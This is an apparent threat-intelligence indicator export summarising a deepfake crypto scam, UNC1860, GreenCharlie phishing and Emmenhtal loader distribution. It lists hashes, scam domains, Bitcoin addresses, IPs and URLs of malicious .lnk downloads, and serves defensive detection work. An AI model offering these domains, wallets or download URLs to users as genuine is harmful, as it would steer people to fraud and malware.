350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd |
FileHash-SHA256 |
360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98 |
FileHash-SHA256 |
37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004 |
FileHash-SHA256 |
39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead |
FileHash-SHA256 |
3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a |
FileHash-SHA256 |
3eb22320da23748f76f2ce56f6f627e4255bc81d09ffb3a011ab067924d8013b |
FileHash-SHA256 |
449d87ca461823bb85c18102605e23997012b522c4272465092e923802a745e9 |
FileHash-SHA256 |
462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7 |
FileHash-SHA256 |
46be54f719ee76af15099de6e337b05a0a442c813e815bbed92a71135cfd9ab2 |
FileHash-SHA256 |
48976d7bf38cca4e952507e9ab27e3874ca01092eed53d0fde89c5966e9533bb |
FileHash-SHA256 |
4b83aaecddfcb8cf5caeff3cb30fee955ecfc3eea97d19dccf86f24c77c41fc4 |
FileHash-SHA256 |
50f45122fdd5f8ca05668a385a734a278aa126ded185c3377f6af388c41788cb |
FileHash-SHA256 |
51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e |
FileHash-SHA256 |
5211ad84270862e68026ce8e6c15c1f8499551e19d2967c349b46d3f8cfcdcaa |
FileHash-SHA256 |
53a06b78d89fe3f981ff32cd7a66f31e099d4bbaac36d7c64ed08d615d314408 |
FileHash-SHA256 |
58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd |
FileHash-SHA256 |
5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43 |
FileHash-SHA256 |
5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221 |
FileHash-SHA256 |
5b6c3d277711d9f847be59b16fd08390fc07d3b27c7c6804e2170f456e9f1173 |
FileHash-SHA256 |
5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa |
FileHash-SHA256 |
62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087 |
FileHash-SHA256 |
69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944 |
FileHash-SHA256 |
699aaea1598a034cde7ed88cd8a8a36fd59447e09bddef566357061774c48a76 |
FileHash-SHA256 |
723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224 |
FileHash-SHA256 |
7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8a |
FileHash-SHA256 |
7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59 |
FileHash-SHA256 |
86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737 |
FileHash-SHA256 |
882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3 |
FileHash-SHA256 |
88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc |
FileHash-SHA256 |
90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7 |
FileHash-SHA256 |
96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be |
FileHash-SHA256 |
9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc |
FileHash-SHA256 |
9f188b2f4aa6a5ff3a6fb9048a20c5566f25bd9fb313ed1ba1d332fadd82690f |
FileHash-SHA256 |
9f948af3a30f125dcd24d8a628b3a18c66b3d72baede8496ee735cbdfd9cf0c7 |
FileHash-SHA256 |
a199c9d91a1e7c7051ec40f0a3a51143aa9f06af47a2a5f0e2dd235d7e1fe386 |
FileHash-SHA256 |
a54fef5fe2af58f5bd75c3af44f1fba22b721f34406c5963b19c5376ab278cd1 |
FileHash-SHA256 |
a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6 |
FileHash-SHA256 |
ab1a3f8a0510ffa3c043bc200fe357c9ce220ea916f50b8b5b454027ef935c54 |
FileHash-SHA256 |
ab913b3bb637447f33add3c7020d353389738e4d532b905caed04c7c7f399277 |
FileHash-SHA256 |
acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f |
FileHash-SHA256 |
ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e |
FileHash-SHA256 |
affcb453760dbc48b39f8d4defbcc4fc65d00df6fae395ee27f031c1833abada |
FileHash-SHA256 |
b18b40f513bae376905e259d325c12f9d700ee95f0d908a4d977a80c0420d52e |
FileHash-SHA256 |
b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9 |
FileHash-SHA256 |
cce74c82a718be7484abf7c51011793f2717cfb2068c92aa35416a93cbd13cfa |
FileHash-SHA256 |
d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1 |
FileHash-SHA256 |
d1949c75e7cb8e57f52e714728817ce323f6980c8c09e161c9e54a1e72777c13 |
FileHash-SHA256 |
d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d |
FileHash-SHA256 |
d8e9e06b7adea939bcc135876f4e8a1d3719120e8ad9d4d72812ffd1dbee62fc |
FileHash-SHA256 |
d943a4aabd76582218fd1a9a0a77b2f6a6715b198f9994f0feae6f249b40fdf9 |
FileHash-SHA256 |
dc56a30c0082145ad5639de443732e55dd895a5f0254644d1b1ec1b9457f04ff |
FileHash-SHA256 |
dd32c037ed9b72acb6eda4f5193c7f1adc1e7e8d2aefcdd4b16de2f48420e1d3 |
FileHash-SHA256 |
df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415 |
FileHash-SHA256 |
df9498892ae72f611128c9a8bc57b93964f34cc235f5aaf57fe10fb2b3c69aa3 |
FileHash-SHA256 |
e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757 |
FileHash-SHA256 |
f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4 |
FileHash-SHA256 |
f14c7eacdb39f1decdcf1e68f57c87340968fede1dc0391b2b082f58bd3a3f93 |
FileHash-SHA256 |
fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08 |
FileHash-SHA256 |
fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f |
domain |
kekeoamigo.com |
|
Deep Fake Crypto Scams |
Cybercriminals exploited the U.S. presidential debate to launch a cryptocurrency scam using deep fake videos. The scam featured fake streams on hijacked YouTube channels, claiming to show Elon Musk and Donald Trump debating Kamala Harris. The videos directed viewers to invest in cryptocurrency during the event. The campaign used well-established YouTube accounts, QR codes linked to deceptive domains, and AI-generated content to lure victims. Multiple researchers reported on this scam, which leveraged current events to boost search rankings. The scammers used 'stream-jacking' to rebrand victim channels as Tesla-related, then posted pre-recorded 'livestreams' with inflated view counts. Scam sites used anti-bot measures and urged victims to link their crypto wallets, with some wallets accumulating significant funds. |
Type |
Indicator |
BitcoinAddress |
bc1qfwjgvwesz5k2dpjpvwueze2v009wjh76hn9gfn |
BitcoinAddress |
bc1qjanjaawj4g0n5xlm03dmpx97u5yrpzljuhuxz8 |
domain |
ark-fund.pro |
domain |
chaindrop.promo |
domain |
crypto-participate.com |
domain |
debate.gift |
domain |
doubleetherx2.com |
domain |
eth-up.gift |
domain |
eth23.io |
domain |
ether2022.info |
domain |
eththemerge.net |
domain |
give-toncoin.com |
domain |
harryteams.com |
domain |
promo-tesla.io |
domain |
takeeth.net |
domain |
tesladebate.com |
domain |
teslatrump.org |
domain |
trump-debate.com |
domain |
trump-elon.gives |
domain |
trumptesla.org |
domain |
usmusk.net |
domain |
x2-event.pro |
domain |
x2coinbase.org |
hostname |
eththemerge.survay.pro |
|
UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks |
UNC1860 is an Iranian state-sponsored threat actor likely affiliated with Iran's Ministry of Intelligence and Security. It employs specialized tools and passive backdoors to gain initial access and persistent network access, particularly targeting government and telecommunications sectors in the Middle East. The group's capabilities include providing initial access for other actors, using GUI-operated malware controllers, and maintaining a diverse collection of passive implants. UNC1860's arsenal includes utilities for defense evasion, kernel-level drivers, and custom implementations of encryption methods. The actor demonstrates advanced Windows OS knowledge and reverse engineering skills, making it a formidable threat capable of supporting various objectives from espionage to network attacks. |
Type |
Indicator |
CVE |
CVE-2019-0604 |
FileHash-MD5 |
07db3058e32fe5f36823dc7092cd7d5b |
FileHash-MD5 |
0c93cac9854831da5f761ee98bb40c37 |
FileHash-MD5 |
0c9ff0db00f04fd4c6a9160bffd85a1d |
FileHash-MD5 |
1176381da7dea356f3377a59a6f0e799 |
FileHash-MD5 |
126bc1c30fba27f8bf67dce4892b1e8c |
FileHash-MD5 |
14e54ff4805840e656efb8cd38de4751 |
FileHash-MD5 |
17b27e6aa0ab6501f11bb4d2e0f829ff |
FileHash-MD5 |
1e6679cd25d1bb127a0bec665adcf21e |
FileHash-MD5 |
1e896f026246872b2feb4f8e3e093815 |
FileHash-MD5 |
2398a83f10329a107801d3d23d06f7cb |
FileHash-MD5 |
286bd9c2670215d3cb4790aac4552f22 |
FileHash-MD5 |
2cece71e107d12ffd74b2fb24bf339a6 |
FileHash-MD5 |
2e803d28809be2a0216f25126efde37b |
FileHash-MD5 |
31f2369d2e38c78f5b3f2035dba07c08 |
FileHash-MD5 |
3d5d05f230ae702c04098de512d93d48 |
FileHash-MD5 |
3dd829fb27353622eff34be1eabb8f18 |
FileHash-MD5 |
4029bc4a06638bb9ac4b8528523b72f6 |
FileHash-MD5 |
41f4732ed369f2224a422752860b0bc5 |
FileHash-MD5 |
46804472541ed61cc904cd14be18fe1d |
FileHash-MD5 |
490590bfdeeedf44b3ae306409bb0d03 |
FileHash-MD5 |
4abcf21b63781a53bbc1aa17bd8d2cbc |
FileHash-MD5 |
4b2c78bb2c439998cff0cc097a14b942 |
FileHash-MD5 |
4dd6250eb2d368f500949952eb013964 |
FileHash-MD5 |
4de802f7e61cb8c820a02e042b58b215 |
FileHash-MD5 |
57c916da83cc634af22bde0ad44d0db3 |
FileHash-MD5 |
57cd8e220465aa8030755d4009d0117c |
FileHash-MD5 |
6626dbe74acd15d06ff6900071ef240c |
FileHash-MD5 |
69fd67c115349abb4a313230a1692642 |
FileHash-MD5 |
6d3041b89484c273376e5189e190d235 |
FileHash-MD5 |
73fb0fe5cd96a14a4f85639223aec6a8 |
FileHash-MD5 |
7b2fa099d51fa3885766f6d60d768748 |
FileHash-MD5 |
7f5f5f290910d256e6b012f898c88bf3 |
FileHash-MD5 |
85427a8a47c4162b48d8dfb37440665d |
FileHash-MD5 |
8d070a93a45ed8ba6dba6bfbe0d084e7 |
FileHash-MD5 |
929b12bc9f9e5f8e854de1d46ebf40d9 |
FileHash-MD5 |
952482949f495fb66e493e441229ae4b |
FileHash-MD5 |
a038975255d3dda636d86ccd307f7838 |
FileHash-MD5 |
a3ea0d13848a104c28d035a9d518acc2 |
FileHash-MD5 |
a500561c0b374816972094c2aa90da2a |
FileHash-MD5 |
a65ee1a82975ee4c8d4e70219e1bfff5 |
FileHash-MD5 |
a7693e399602eb79db537c5022dd1e01 |
FileHash-MD5 |
a90236e4962620949b720f647a91f101 |
FileHash-MD5 |
a991bdbf1e36d7818d7a340a35a4ea26 |
FileHash-MD5 |
b219672bcd60ce9a81b900217b3b5864 |
FileHash-MD5 |
b26d54b7da7b2bf600104f69da4ea00f |
FileHash-MD5 |
b34883fb1630db43e06a38cebfa0bce2 |
FileHash-MD5 |
b4b1e285b9f666ae7304a456da01545e |
FileHash-MD5 |
bd6464f12bb6f7f02b6ffebb363d8e5f |
FileHash-MD5 |
c11a4e4a2d484513f79bd127a0387b0c |
FileHash-MD5 |
c21eefc65cda49f17ddd1d243a7bffb5 |
FileHash-MD5 |
c50ae2c4b76f0d5724ec240568c78c4f |
FileHash-MD5 |
c517519097bff386dc1784d98ad93f9d |
FileHash-MD5 |
c57e59314aee7422e626520e495effe0 |
FileHash-MD5 |
c8fa0ce3ae6a13af640607ea606c55f9 |
FileHash-MD5 |
c90ec587e3333dabb647ebc182673460 |
FileHash-MD5 |
ca3f0d25f7da0e8cde8e1f367451c77a |
FileHash-MD5 |
caffdb648a0a68cd36694f0f0c7699d7 |
FileHash-MD5 |
ce537dd649a391e52c27a3f88a0a8912 |
FileHash-MD5 |
d1ce3117060e85247145c82005dda985 |
FileHash-MD5 |
d1e45afbfd3424612b4a4218cc7357ef |
FileHash-MD5 |
d87ca3f830b8b53fde358bb64900f6af |
FileHash-MD5 |
d9719f6738dbfaa21be7f184512fe074 |
FileHash-MD5 |
da0085a97c38ead734885e5cced1847f |
FileHash-MD5 |
e67687b4443f58d2b0a465e3af3caffe |
FileHash-MD5 |
e86e885e6c96ac72482741d8696c17fb |
FileHash-MD5 |
efe8043e1b4214640c5f7b5ddf737653 |
FileHash-MD5 |
f0dfb7bf01c0412891da8fa2702f4c7b |
FileHash-MD5 |
f292e61774c267c3787fdfcace50ea7b |
FileHash-MD5 |
f89be788e4adf665acf1a8ef8fcaa133 |
FileHash-MD5 |
fa1c6f7a5e02374b9d33de2578cb3399 |
FileHash-MD5 |
fc90907e70f18c7f6a6b9d9599b6f97c |
FileHash-MD5 |
ff6f16b00c9f36b32cd60fecd4dfc8e9 |
FileHash-SHA1 |
22c9da04847c26188226c3a345e2126ef00aa19e |
FileHash-SHA1 |
2df9c309e08140e9e9af624a6c40355819a91720 |
FileHash-SHA1 |
32a1651bb810bbe58df73bc2d2c2fa702ca7abd0 |
FileHash-SHA1 |
398ee9da244c53a136efee5e1d8acd1298008497 |
FileHash-SHA1 |
39cc32a3ede0d01cd89c7b5424beda618f805982 |
FileHash-SHA1 |
3f2fd2dfd27bf3cafcbf0946e308832e11a1d9c1 |
FileHash-SHA1 |
4c34d1cd875e39a8fa854eff3b520cdc68275f9d |
FileHash-SHA1 |
6802e2d2d4e6ee38aa513dafd6840e864310513b |
FileHash-SHA1 |
6cafd44c86fff605b4c25582955b725b96c1d911 |
FileHash-SHA1 |
6ec0c1d6311656c76787297775a8d0cb0aa6c4c7 |
FileHash-SHA1 |
70bc7b43e119060dce54568a1beb140da565a482 |
FileHash-SHA1 |
7820e56fbcde06ff766239e58c53610151962def |
FileHash-SHA1 |
7f7d144cc80129d0db3159ea5d4294c34b79b20a |
FileHash-SHA1 |
9c58ec8f7ce75ba1b629c9ef84ab069a32313288 |
FileHash-SHA1 |
a4044e90be800adab547a238f8639db3cf92ebdc |
FileHash-SHA1 |
b8421c8e54fa5dabcfd38df68b3ac93b449d8d2d |
FileHash-SHA1 |
b871e9afd7da87ee818ed7349a1579f3b31e104f |
FileHash-SHA1 |
c0afb5797e6873bbee69f9bf0aa7a9dd3a1c6fff |
FileHash-SHA1 |
c1fbe0fc31099b71315355da25a7036ea51a8627 |
FileHash-SHA1 |
dba1dce5bfe4e0290bd378a0126492569bdabc39 |
FileHash-SHA1 |
e287f70804460043b12410f95b4fa400e1910f42 |
FileHash-SHA1 |
eb60ffb03e1da380563e796b867fbddeb1fac77d |
FileHash-SHA1 |
ec238353f020243758eb7511dddf8ab6ba01b35d |
FileHash-SHA256 |
1146b1f38e420936b7c5f6b22212f3aa93515f3738c861f499ed1047865549cb |
FileHash-SHA256 |
1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e |
FileHash-SHA256 |
2097320e71990865f04b9484858d279875cf5c66a5f6d12c819a34e2385da838 |
FileHash-SHA256 |
269d7faed3a01b5ff9181df32e3fdbf7f7f193cc53e4f28aa21290343e69f3cd |
FileHash-SHA256 |
36b61f94bdfc86e736a4ee30718e0b1ee1c07279db079d48d3fe78b1578dbf03 |
FileHash-SHA256 |
3875ed58c0d42e05c83843b32ed33d6ba5e94e18ffe8fb1bf34fd7dedf3f82a7 |
FileHash-SHA256 |
596b2a90c1590eaf704295a2d95aae5d2fec136e9613e059fd37de4b02fd03bb |
FileHash-SHA256 |
6f0a38c9eb9171cd323b0f599b74ee571620bc3f34aa07435e7c5822663de605 |
FileHash-SHA256 |
7495c1ea421063845eb8f4599a1c17c105f700ca0671ca874c5aa5aef3764c1c |
FileHash-SHA256 |
8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330 |
FileHash-SHA256 |
9117bd328e37be121fb497596a2d0619a0eaca44752a1854523b8af46a5b0ceb |
FileHash-SHA256 |
a052413e65e025cbefdddff6eeae91161de17ffec16d3a741dd9b7c33d392435 |
FileHash-SHA256 |
a2598161e1efff623de6128ad8aafba9da0300b6f86e8c951e616bd19f0a572b |
FileHash-SHA256 |
c0dc609e6fc8801bb902d14910c3ffd69d6bd5a26389836446dc4c23565ddcc7 |
FileHash-SHA256 |
c3fa9432243e1a2ab1991ab4c07a19392038e6a8e817e5fea0232c4caabbb950 |
FileHash-SHA256 |
c5b4542d61af74cf7454d7f1c8d96218d709de38f94ccfa7c16b15f726dc08c0 |
FileHash-SHA256 |
da450c639c9a50377233c0f195c3f6162beb253f320ed57d5c9bb9c7f0e83999 |
FileHash-SHA256 |
e1ad173e49eee1194f2a55afa681cef7c3b8f6c26572f474dec7a42e9f0cdc9d |
FileHash-SHA256 |
f4639c63fb01875946a4272c3515f005d558823311d0ee4c34896c2b66122596 |
FileHash-SHA256 |
f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d |
FileHash-SHA256 |
fa2c5fa2814d4db288bf8733edc4f1a78cd2c72cde90f42cf5b14162ac648042 |
FileHash-SHA256 |
fe14edf4db2a9838f15aaf24a5837ffc5c901313d6fd2fe60d15401154e44406 |
|
GreenCharlie Infrastructure Linked to US Political Campaign Targeting |
An analysis by Insikt Group revealed a significant surge in cyber threat activities from GreenCharlie, an Iran-linked group associated with Mint Sandstorm, Charming Kitten, and APT42. The group persistently targets US political and governmental entities through sophisticated phishing operations involving malware like GORBLE and POWERSTAR. Their infrastructure employs dynamic DNS providers and deceptive domain themes to facilitate phishing attacks. Recorded Future's Network Intelligence identified Iran-based IP addresses communicating with GreenCharlie's infrastructure, further suggesting Iranian involvement in these operations. |
Type |
Indicator |
FileHash-SHA256 |
33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 |
FileHash-SHA256 |
4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f |
FileHash-SHA256 |
c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 |
domain |
activeeditor.info |
domain |
chatsynctransfer.info |
domain |
cloudarchive.info |
domain |
cloudregionpages.info |
domain |
directfileinternal.info |
domain |
itemselectionmode.info |
domain |
messagepending.info |
domain |
onetimestorage.info |
domain |
onlinecloudzone.info |
domain |
personalcloudparent.info |
domain |
personalwebview.info |
domain |
pkglessplans.xyz |
domain |
projectdrivevirtualcloud.co.uk |
domain |
realcloud.info |
domain |
researchdocument.info |
domain |
selfpackage.info |
domain |
webviewerpage.info |
hostname |
admin.cheap-case.site |
hostname |
api.cheap-case.site |
hostname |
api.overall-continuing.site |
hostname |
app.cheap-case.site |
hostname |
backend.cheap-case.site |
hostname |
callfeedback.duia.ro |
hostname |
cloudtools.duia.eu |
hostname |
coldwarehexahash.dns-dynamic.net |
hostname |
contentpreview.redirectme.net |
hostname |
continue.duia.eu |
hostname |
continueresource.forumz.info |
hostname |
demo.cheap-case.site |
hostname |
destinationzone.duia.eu |
hostname |
dev.cheap-case.site |
hostname |
doceditor.duckdns.org |
hostname |
documentcloudeditor.ddnsgeek.com |
hostname |
dynamicrender.line.pm |
hostname |
dynamictranslator.ddnsgeek.com |
hostname |
editioncloudfiles.dns-dynamic.net |
hostname |
entryconfirmation.duckdns.org |
hostname |
filereader.dns-dynamic.net |
hostname |
finaledition.redirectme.net |
hostname |
highlightsreview.line.pm |
hostname |
hugmefirstddd.ddns.net |
hostname |
icenotebook.ddns.net |
hostname |
joincloud.duckdns.org |
hostname |
joincloud.mypi.co |
hostname |
lineeditor.001www.com |
hostname |
lineeditor.32-b.it |
hostname |
lineeditor.mypi.co |
hostname |
linereview.duia.eu |
hostname |
longlivefreedom.ddns.net |
hostname |
mobiletoolssdk.dns-dynamic.net |
hostname |
nextcloud.duia.us |
hostname |
nextcloudzone.dns-dynamic.net |
hostname |
overflow.duia.eu |
hostname |
preparingdestination.fixip.org |
hostname |
readquickarticle.dns-dynamic.net |
hostname |
realpage.redirectme.net |
hostname |
reviewedition.duia.eu |
hostname |
searchstatistics.duckdns.org |
hostname |
sharestoredocs.theworkpc.com |
hostname |
smartview.dns-dynamic.net |
hostname |
softservicetel.ddns.net |
hostname |
sourceusedirection.mypi.co |
hostname |
storageprovider.duia.eu |
hostname |
streaml23.duia.eu |
hostname |
synctimezone.dns-dynamic.net |
hostname |
termsstatement.duckdns.org |
hostname |
thisismyapp.accesscam.org |
hostname |
thisismydomain.chickenkiller.com |
hostname |
timelinepage.dns-dynamic.net |
hostname |
timezone-update.duckdns.org |
hostname |
towerreseller.dns-dynamic.net |
hostname |
tracedestination.duia.eu |
hostname |
translatorupdater.dns-dynamic.net |
hostname |
uptime-timezone.dns-dynamic.net |
hostname |
uptimezonemetadta.run.place |
hostname |
vector.kozow.com |
hostname |
viewdestination.vpndns.net |
hostname |
worldstate.duia.us |
hostname |
www.chatsynctransfer.info |
hostname |
www.selfpackage.info |
|
WebDAV-as-a-Service: Uncovering the infrastructure behind Emmenhtal loader distribution - Sekoia.io Blog |
The Emmenhtal loader, also known as PeakLight, operates in a memory-only manner, making it difficult to detect and analyse. It is primarily used to distribute other malicious payloads, including well-known infostealers that target sensitive information. |
Type |
Indicator |
IPv4 |
104.131.7.207 |
IPv4 |
141.98.234.166 |
IPv4 |
147.45.178.54 |
IPv4 |
147.45.50.142 |
IPv4 |
147.45.50.144 |
IPv4 |
147.45.50.172 |
IPv4 |
147.45.50.214 |
IPv4 |
147.45.50.23 |
IPv4 |
147.45.50.26 |
IPv4 |
147.45.50.34 |
IPv4 |
147.45.50.57 |
IPv4 |
147.45.50.86 |
IPv4 |
147.45.79.82 |
IPv4 |
151.236.17.180 |
IPv4 |
168.100.9.199 |
IPv4 |
178.209.51.222 |
IPv4 |
185.143.223.188 |
IPv4 |
185.196.8.158 |
IPv4 |
191.243.196.114 |
IPv4 |
193.124.33.71 |
IPv4 |
193.233.75.13 |
IPv4 |
194.190.152.108 |
IPv4 |
194.87.252.22 |
IPv4 |
200.150.194.109 |
IPv4 |
206.188.196.28 |
IPv4 |
212.18.104.111 |
IPv4 |
45.151.62.238 |
IPv4 |
46.29.234.129 |
IPv4 |
62.133.61.101 |
IPv4 |
62.133.61.104 |
IPv4 |
62.133.61.106 |
IPv4 |
62.133.61.148 |
IPv4 |
62.133.61.155 |
IPv4 |
62.133.61.168 |
IPv4 |
62.133.61.189 |
IPv4 |
62.133.61.207 |
IPv4 |
62.133.61.240 |
IPv4 |
62.133.61.26 |
IPv4 |
62.133.61.37 |
IPv4 |
62.133.61.43 |
IPv4 |
62.133.61.49 |
IPv4 |
62.133.61.56 |
IPv4 |
62.133.61.69 |
IPv4 |
62.133.61.73 |
IPv4 |
62.133.61.79 |
IPv4 |
62.133.61.90 |
IPv4 |
62.133.61.97 |
IPv4 |
62.133.61.98 |
IPv4 |
78.153.139.202 |
IPv4 |
79.137.203.158 |
IPv4 |
82.115.223.234 |
IPv4 |
84.247.187.231 |
IPv4 |
89.110.78.58 |
IPv4 |
89.23.103.118 |
IPv4 |
89.23.103.123 |
IPv4 |
89.23.103.15 |
IPv4 |
89.23.103.188 |
IPv4 |
89.23.103.205 |
IPv4 |
89.23.103.253 |
IPv4 |
89.23.103.56 |
IPv4 |
89.23.103.57 |
IPv4 |
89.23.103.8 |
IPv4 |
89.23.103.97 |
IPv4 |
89.23.107.113 |
IPv4 |
89.23.107.123 |
IPv4 |
89.23.107.168 |
IPv4 |
89.23.107.181 |
IPv4 |
89.23.107.240 |
IPv4 |
89.23.107.244 |
IPv4 |
89.23.107.251 |
IPv4 |
89.23.107.67 |
IPv4 |
89.23.113.140 |
IPv4 |
91.202.233.136 |
IPv4 |
91.92.240.234 |
IPv4 |
91.92.240.247 |
IPv4 |
91.92.240.29 |
IPv4 |
91.92.243.198 |
IPv4 |
91.92.243.74 |
IPv4 |
91.92.245.185 |
IPv4 |
91.92.245.222 |
IPv4 |
91.92.246.102 |
IPv4 |
91.92.248.129 |
IPv4 |
91.92.248.50 |
IPv4 |
91.92.248.77 |
IPv4 |
91.92.248.90 |
IPv4 |
91.92.250.123 |
IPv4 |
91.92.250.150 |
IPv4 |
91.92.250.44 |
IPv4 |
91.92.251.35 |
IPv4 |
91.92.253.126 |
IPv4 |
91.92.254.167 |
IPv4 |
91.92.254.225 |
IPv4 |
92.118.112.223 |
IPv4 |
92.118.112.253 |
IPv4 |
94.131.112.206 |
IPv4 |
94.156.64.74 |
IPv4 |
94.156.64.76 |
IPv4 |
94.156.65.126 |
IPv4 |
94.156.65.130 |
IPv4 |
94.156.69.111 |
IPv4 |
94.156.69.6 |
IPv4 |
94.156.8.31 |
IPv4 |
95.164.68.24 |
IPv4 |
95.216.196.85 |
URL |
http://147.45.50.214/Downloads/demo.pdf.lnk |
URL |
http://147.45.50.57/Downloads/INVOICE%20340138551.pdf.lnk |
URL |
http://147.45.79.82/Downloads/qqeng.pdf.lnk |
URL |
http://151.236.17.180/Wire%20Confirmation/WireConfirmation.pdf.lnk |
URL |
http://206.188.196.28/Downloads/example.lnk |
URL |
http://62.133.61.101/Downloads/Invoice.pdf.lnk |
URL |
http://62.133.61.104/Downloads/test.pdf.lnk |
URL |
http://62.133.61.37/Downloads/config.txt.lnk |
URL |
http://62.133.61.73/Downloads/Photo.lnk |
URL |
http://89.23.103.56/Downloads/Videof/Full%20Video%20HD%20%281080p%29.lnk |
URL |
http://89.23.107.244/Downloads/Test.lnk |
URL |
http://89.23.107.67/Downloads/2023-Documents%20Shared.lnk |
URL |
http://91.92.243.198:81/Downloads/test.lnk |
URL |
http://91.92.251.35/Downloads/solaris-docs.lnk |
URL |
http://92.118.112.253/Downloads/releaseform.pdf.lnk |
URL |
http://94.156.64.74/Downloads/SecretTeachings.pdf.lnk |
|